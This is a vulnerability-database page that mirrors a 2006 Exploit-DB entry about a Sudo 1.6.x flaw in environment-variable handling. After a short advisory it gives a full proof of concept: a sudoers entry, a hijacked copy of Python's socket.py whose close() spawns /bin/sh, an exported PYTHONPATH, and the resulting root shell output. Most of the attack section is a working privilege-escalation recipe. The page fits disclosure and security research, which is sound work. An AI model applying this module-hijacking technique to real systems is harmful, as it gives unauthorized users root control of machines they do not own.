Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sudo 1.6.x - Environment Variable Handling Security Bypass (2)

🗓️ 09 Jan 2006 00:00:00Reported by Breno Silva PintoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 487 Views

Sudo 1.6.x allows local attackers to execute arbitrary code via Python scripts, causing security bypass.

Code
source: https://www.securityfocus.com/bid/16184/info
 
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
 
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
 
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
 
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability). 

## Sudo local root escalation privilege ##
## vuln versions :  sudo < 1.6.8p10
## adv : https://www.securityfocus.com/bid/16184
## by breno - breno at kalangolinux dot org

## You need sudo access execution for some python script ##


## First look sudoers file. User 'breno' can execute expl_python_sudo.py script

breno  ~ $ -> cat /etc/sudoers

breno   ALL=(ALL) /home/breno/expl_python_sudo.py

## Second, see our simple PoC python script

breno  ~ $ -> cat /home/breno/expl_python_sudo.py
#!/usr/bin/python
import sys
import socket
import os

print "Python Sudo Exploit"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.close()
breno  ~ $ ->

## Sexy !! Do nothing :)

## Ok. What you need to do to get root is hijacking socket.py module , change close()
function to execute something and
## change PYTHONPTAH env.

breno  ~ $ -> cp /usr/lib/python2.3/socket.py /home/breno/

breno  ~ $ -> vi /home/breno/socket.py
...
import os
...
def close(self):
os.execl("/bin/sh","/bin/ah");
self._sock = _closedsocket()
self.send = self.recv = self.sendto = self.recvfrom = self._sock._dummy
close.__doc__ = _realsocket.close.__doc__
...

## Ok .. save it and export env

breno  ~ $ -> export PYTHONPATH=/home/breno

## .. and execute script. Too much sexy !!!

breno  ~ $ -> sudo /home/breno/expl_python_sudo.py
Python Sudo Exploit
root  ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root  ~ # ->

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4
sudo security vulnerabilityarbitrary code executionlocal attackerpython script exploitelevated privileges
487